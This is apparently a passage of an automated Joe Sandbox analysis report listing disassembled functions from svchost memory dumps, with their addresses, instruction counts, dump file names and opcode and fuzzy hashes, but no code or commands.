                                                                    • Instruction ID: 9a6ccf72aff78202b30a598412f5084420bb3dc5687d8c1ede6938b7cf894e7c
                                                                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                    • Instruction Fuzzy Hash: BF418475B00219AFDB15DF99CD85ABFBBBAAF88600F1840A9EA04A7341D770DD01C7A0
                                                                    Function 036DD5B0 Relevance: .1, Instructions: 128COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df6a9ae266ec2a942b427eeeba0703b0dd5d946f9a87816e35ae1985faedc55d
                                                                    • Instruction ID: 3de7a3bac1067162d11498fa96392c7a6c34f5eec1e0c2db2e277948e3ec77d1
                                                                    • Opcode Fuzzy Hash: df6a9ae266ec2a942b427eeeba0703b0dd5d946f9a87816e35ae1985faedc55d
                                                                    • Instruction Fuzzy Hash: 3441D030E08295AFCB14EF29C495ABAFBF1EF59300F098499E4C58F345D735A466DBA0
                                                                    Function 0365D6E0 Relevance: .1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a40c5f678e38c48d02316e2cee1ed43fd82cb9ca6e7ac33f80fd768b0da6e3b0
                                                                    • Instruction ID: 265a806a6c8e4e2291fe2a15e0eb1ed0c2b1006f4587add062a44c289c1d02ec
                                                                    • Opcode Fuzzy Hash: a40c5f678e38c48d02316e2cee1ed43fd82cb9ca6e7ac33f80fd768b0da6e3b0
                                                                    • Instruction Fuzzy Hash: E541E0795043009FDB24EF66C990F6AB7A8EB59320F01462EF8158F290CB34A841CB99
                                                                    Function 0362A020 Relevance: .1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                    • Instruction ID: d15a16ea184608389217507043f45aec998b574930675014a11e2a20dc0c0e76
                                                                    • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                    • Instruction Fuzzy Hash: 34414A31A00621DBCB20EFE4C5407BAFB72EB44758F1A816AE9458F380DA719D81CF90
                                                                    Function 03660710 Relevance: .1, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                    • Instruction ID: b8597461f0a42ba787aa2e791db0a42892a580a6bd12fcbe00a4bfe3af91bd31
                                                                    • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                    • Instruction Fuzzy Hash: EC410575A04705EFCB24CF98C990AAABBF8FF08740B20497DE556DB690D730AA45CF90
                                                                    Function 0363262C Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 528808e32c4051b6647d1a1d583b96bb11b521620be5c7dc083f543564567ef2
                                                                    • Instruction ID: 0773c4b45681d7d309f9d9b338c3fde05f9b655d62541d8d525fcc3eac061bd7
                                                                    • Opcode Fuzzy Hash: 528808e32c4051b6647d1a1d583b96bb11b521620be5c7dc083f543564567ef2
                                                                    • Instruction Fuzzy Hash: 8B41BE74901714DFCB21EF28DA54B69BBF5FF4A310F248AAEC4169B3A1EB309941CB51
                                                                    Function 036FFFB1 Relevance: .1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb8e568de2e2979ad0e9c506bd4d7c3ffecd24b682a0623bd53e6023dddb801f
                                                                    • Instruction ID: 161773287e11ab05c1fa6663dcea18c3a3291dd9ff5fe29be1b0abb49cc3efe5
                                                                    • Opcode Fuzzy Hash: bb8e568de2e2979ad0e9c506bd4d7c3ffecd24b682a0623bd53e6023dddb801f
                                                                    • Instruction Fuzzy Hash: 7D414731A042599BC740CB26D4A0BBBBFF1EF85219F0CC1AAD881AB386D639C506D770
                                                                    Function 036FFA49 Relevance: .1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0ee558be41831cbeabd19e2b9e48b094ff53e9db53e1b0c9c491a5219625db41
                                                                    • Instruction ID: fea28a1db2580d936adc6f48cf65c5cedce7e5570af1a2d2780373552e71ad56
                                                                    • Opcode Fuzzy Hash: 0ee558be41831cbeabd19e2b9e48b094ff53e9db53e1b0c9c491a5219625db41
                                                                    • Instruction Fuzzy Hash: D03109367141069FC718CF29CC44AA7BBA9EF89750F088678EA18CF385E7B4D945C794
                                                                    Function 036FEEDB Relevance: .1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8f7161c0df1f2db5f0a7904fbc74a6fd89d0ae65b2da0ff5356d4eaba66d9c61
                                                                    • Instruction ID: 80a7eb6ce447fe513e243b63fc2657083c620cf2d3c476d8064b9b9910fd307d
                                                                    • Opcode Fuzzy Hash: 8f7161c0df1f2db5f0a7904fbc74a6fd89d0ae65b2da0ff5356d4eaba66d9c61
                                                                    • Instruction Fuzzy Hash: F441BF33E0402A8FCB18CF68D49197AF7F1FB48304B9642BDD906AB295DB34AD05CB90
                                                                    Function 036FFB76 Relevance: .1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b166827137602c44fa51ac4aea1a1465eaec3724278c277d83401e947cc95345
                                                                    • Instruction ID: 801f06ebc89de2a430525b577747d8157cd56aedaeffaf012400a0a426c08874
                                                                    • Opcode Fuzzy Hash: b166827137602c44fa51ac4aea1a1465eaec3724278c277d83401e947cc95345
                                                                    • Instruction Fuzzy Hash: B731F236A10215AFD714DF29CD44AABBBEAEF8D350F448468FA08CF241DA34E901C794
                                                                    Function 0040E563 Relevance: .1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                    • Instruction ID: 2b3e1c5592cb0699157a6d1260a6614b2f7bc26e8d5adcb86a061b103ca4ee51
                                                                    • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                    • Instruction Fuzzy Hash: E231921165C6F10ED30E836E08BD675AEC18E9720174EC2FEDADA6F2F3C4888418D3A5
                                                                    Function 036402E1 Relevance: .1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                    • Instruction ID: 71a6d67ebdf680cf3c1c9f2f8117f5b5dff19ea1a3f197bee210b762d9bacffe
                                                                    • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                    • Instruction Fuzzy Hash: 55314632E04254AFDB22DB68CC40B9AFFE8FF05310F0885AAE815DB351D6749885CBA4
                                                                    Function 03659274 Relevance: .1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7d4ca5ea89d3dc41ff486a0cdbb88306fc2e98176bd7c67868c48e475653b4c
                                                                    • Instruction ID: 07847718598e04e8339a750287767f07e2b49c445f40e67cf8e9e94f8f277898
                                                                    • Opcode Fuzzy Hash: c7d4ca5ea89d3dc41ff486a0cdbb88306fc2e98176bd7c67868c48e475653b4c
                                                                    • Instruction Fuzzy Hash: D3315075A00328EFDB25DB24CC40B9AB7B9EF86710F5501A9B94DAB280DB309E45CB95
                                                                    Function 03635702 Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d376ed4d6ea837d79d819f1f5a473c7a13673cb0df71f63fb4d0aa89d32ed84
                                                                    • Instruction ID: 864fa255551eae5ba7f9aa9e63d4fbc85ad4cd71ae6461eb2d6fc905b442eeab
                                                                    • Opcode Fuzzy Hash: 8d376ed4d6ea837d79d819f1f5a473c7a13673cb0df71f63fb4d0aa89d32ed84
                                                                    • Instruction Fuzzy Hash: 3131AE35701A06EFDB51DB24CA84AA9FBB9BF46354F045069EA428BB50DB70E821CBD0
                                                                    Function 03634260 Relevance: .1, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80ff27fd3bce9331222c949b33cd466a6c2fb83aa8dff8acf64ba847be10ebf1
                                                                    • Instruction ID: 400bdc7c8cd4f2900dd224aadb92f119e71fe95772b27eb1c854287ad4ff5913
                                                                    • Opcode Fuzzy Hash: 80ff27fd3bce9331222c949b33cd466a6c2fb83aa8dff8acf64ba847be10ebf1
                                                                    • Instruction Fuzzy Hash: 1A419F35200B45DFDB22DF25C981BD6BBE9AF46714F14842EE59A8F350CB74E804CB94
                                                                    Function 036550E4 Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                    • Instruction ID: f9b394f749e9ed18dcfca74dd1417386c22b9788c74fdc152c63fd15dc16c0b5
                                                                    • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                    • Instruction Fuzzy Hash: 1031D4316083419BDB31DA28C904767BEA9AB86754F0C857EFE878B385D674D841C792
                                                                    Function 036F61C3 Relevance: .1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1bee867120131c845fd1ced90d4ff23a686bb015986df51b6c3f3c4c637090ea
                                                                    • Instruction ID: ced5efbfd359d9a295c5873b8a0881cb61175a1064dfacb4dc7b8381900af436
                                                                    • Opcode Fuzzy Hash: 1bee867120131c845fd1ced90d4ff23a686bb015986df51b6c3f3c4c637090ea
                                                                    • Instruction Fuzzy Hash: BF31B276A00215EFDB15DFA8CD44BAEB7B5FB44740F454169E500AB244D774ED01CBA8
                                                                    Function 036F6BD7 Relevance: .1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a64fb45376e1bb725fa96dad7db02a88e94aa1ce8f340a5d9d75c24d5d09b6bd
                                                                    • Instruction ID: 58cc671dcf3785253f7e21099107cb92389bd0b7945cedb4e481f2fa8749abae
                                                                    • Opcode Fuzzy Hash: a64fb45376e1bb725fa96dad7db02a88e94aa1ce8f340a5d9d75c24d5d09b6bd
                                                                    • Instruction Fuzzy Hash: 06316C316002049FCB24DF2AD985A9B7BF4FF4D340B858469E908DF24AD670E945CBA4
                                                                    Function 036F60B8 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4459a0f7ceb5672f98aa34bf28ff158abaa6c78d8af5ae1f91041e06ee757332
                                                                    • Instruction ID: 9bd2d3a09d0131745696f18972d9d2716102402659dda2ede146736186cbc0a7
                                                                    • Opcode Fuzzy Hash: 4459a0f7ceb5672f98aa34bf28ff158abaa6c78d8af5ae1f91041e06ee757332
                                                                    • Instruction Fuzzy Hash: 6631E075B00215AFDB22EBA9C950B6EBFB9AB44314F1440ADE641EB342DA30DC018B90
                                                                    Function 036307AF Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8f3c38ac00e96ae4ce541b08c3c244ca9298a7d091460686ec9458eb67c988b
                                                                    • Instruction ID: d889fedf21ba9480ae87dc92ff31182635a91622974fb1316494510db0a45cdc
                                                                    • Opcode Fuzzy Hash: e8f3c38ac00e96ae4ce541b08c3c244ca9298a7d091460686ec9458eb67c988b
                                                                    • Instruction Fuzzy Hash: FD31D776A04751DBCB11EF248880E6BBBA9EF86660F06452DFC579B310DB30DC1987D5
                                                                    Function 0042EE93 Relevance: .1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4774fd760212dd31f92b0b62bec096809a063cbc9b723963839642da59630e31
                                                                    • Instruction ID: 4be5f91f125d47fae8f65d5bfde6c439e6c343cc463d0240f28d6131e882653e
                                                                    • Opcode Fuzzy Hash: 4774fd760212dd31f92b0b62bec096809a063cbc9b723963839642da59630e31
                                                                    • Instruction Fuzzy Hash: CA31E172B006265BD354CE3AD880656F3E6FB88310B95863AD918C3B80E778FD61CBD0
                                                                    Function 0362D6AA Relevance: .1, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                    • Instruction ID: 8201191b22ca0430c3be198f3718c428a31169d06596c3ccec97cabf4c79b354
                                                                    • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                    • Instruction Fuzzy Hash: 9231C536A00E24AFDB21DE54CA88B6ABBB9DB84750F1E8469ED259B350D338DD41CF50
                                                                    Function 004031F0 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7efa629d6c40c67ce03d40c3a8348811418d5dc571428e6ed3c19f0ef3534209
                                                                    • Instruction ID: 953c7d72b736466bd3d9e7436717996dc379d3935a60b2917fb3e8a8015af63c
                                                                    • Opcode Fuzzy Hash: 7efa629d6c40c67ce03d40c3a8348811418d5dc571428e6ed3c19f0ef3534209
                                                                    • Instruction Fuzzy Hash: A4319172A10B108BE368CE7ED945703B7D5AB8C314B05477EE95AD7790DA78ED01CB84
                                                                    Function 036357C0 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00e8d71cf2be50e93405d714a0cb42b90ceabd5393882e4078d172d4ad9cc9c3
                                                                    • Instruction ID: 0cb04671c39df379e6d09794981bb0e6cfca1c204bd3392ba2bc5c2c3749e92c
                                                                    • Opcode Fuzzy Hash: 00e8d71cf2be50e93405d714a0cb42b90ceabd5393882e4078d172d4ad9cc9c3
                                                                    • Instruction Fuzzy Hash: 9C319239715A09FFDB51DB24DB44AA9BBAAFF46310F54506AE9028BB50D731E831CBC0
                                                                    Function 0366A6C7 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                    • Instruction ID: 1d54de1acf0eca5360f867f49c80eb1d2371359ee03901e61c999fbe9a6a3572
                                                                    • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                    • Instruction Fuzzy Hash: 6A310FB6B00B01AFD764CF69DE45B57BBF8BB08690F18452DA59AD3750E630E900CB64
                                                                    Function 0365438F Relevance: .1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0441c3a238080520459250624a605412036bbadbfd2534a6d172fdee32ce4ecd
                                                                    • Instruction ID: cdf82f82e0727f945692e2908a2c4f3689bb5230f0ea9846403e84b49d9f5a77
                                                                    • Opcode Fuzzy Hash: 0441c3a238080520459250624a605412036bbadbfd2534a6d172fdee32ce4ecd
                                                                    • Instruction Fuzzy Hash: CC31D631B003059FDB21EFA9C980A6FB7F9EB84305F00857AE845D7254DB30E985CBA0
                                                                    Function 036392C5 Relevance: .1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                    • Instruction ID: cac8d83aa08e1b49880c9c8018781a24649a2448298b687a247937402bf52094
                                                                    • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                    • Instruction Fuzzy Hash: 1F319CB56083099FDB01DF18D940A9ABBE9FF89310F04096AF8519B3A0D730DC15CBA6
                                                                    Function 03687190 Relevance: .1, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                    • Instruction ID: f31aa4fac2b259c1e62ec93dcf1578a7dc8e7ab6166ef008b628589629761313
                                                                    • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                    • Instruction Fuzzy Hash: 71318A75604206CFC710CF18C580956FBF5FF8D350B2986A9E9989B325EB30ED06CB91
                                                                    Function 036EC3CD Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                    • Instruction ID: caff551f300f700a89024828975f6dd61dadb9ef4dc3b67a18d2c364f0a896f7
                                                                    • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                    • Instruction Fuzzy Hash: 0321083F601755AACB25EBA58800ABEF7B4EF40610F40801EFDA68B691E634D954C774
                                                                    Function 0362C156 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe2133a2820354d41b1e79edfef5069e8f18e57d8ad8156936cc8a51bce6aa9d
                                                                    • Instruction ID: c19ae07faeaaa4c241daf3b67227c2f46200cb3c9878d651d0c6d7e2938b0a96
                                                                    • Opcode Fuzzy Hash: fe2133a2820354d41b1e79edfef5069e8f18e57d8ad8156936cc8a51bce6aa9d
                                                                    • Instruction Fuzzy Hash: F931E5755003108BDB34FF24C845BA9BBB8AF45314F5882ADD9469F3C1DA749986CBA4
                                                                    Function 037003E6 Relevance: .1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12a67896621a3c2b6a5a6a31ab9882f18098fcb939a490ece4fbbd8395b78f8e
                                                                    • Instruction ID: 132c2408ac0f4465ec540a8d11c6b1ef10cc522ef4f4c2316f79199d36bd1674
                                                                    • Opcode Fuzzy Hash: 12a67896621a3c2b6a5a6a31ab9882f18098fcb939a490ece4fbbd8395b78f8e
                                                                    • Instruction Fuzzy Hash: CF313E71A00119EBCB18DBA5D898F9FBBB9FB8D214F454169E905E7241DB30AE04CBA4
                                                                    Function 0362E388 Relevance: .1, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                    • Instruction ID: 45bddeec9d56b6027aad9540e24f39243b4fc3894dd3fbabdcdd04d9166e5cfe
                                                                    • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                    • Instruction Fuzzy Hash: DB31A935600A14EFDB21DF68C984F6ABBF8EF84354F1545A9E5128B390E730EE02CB60
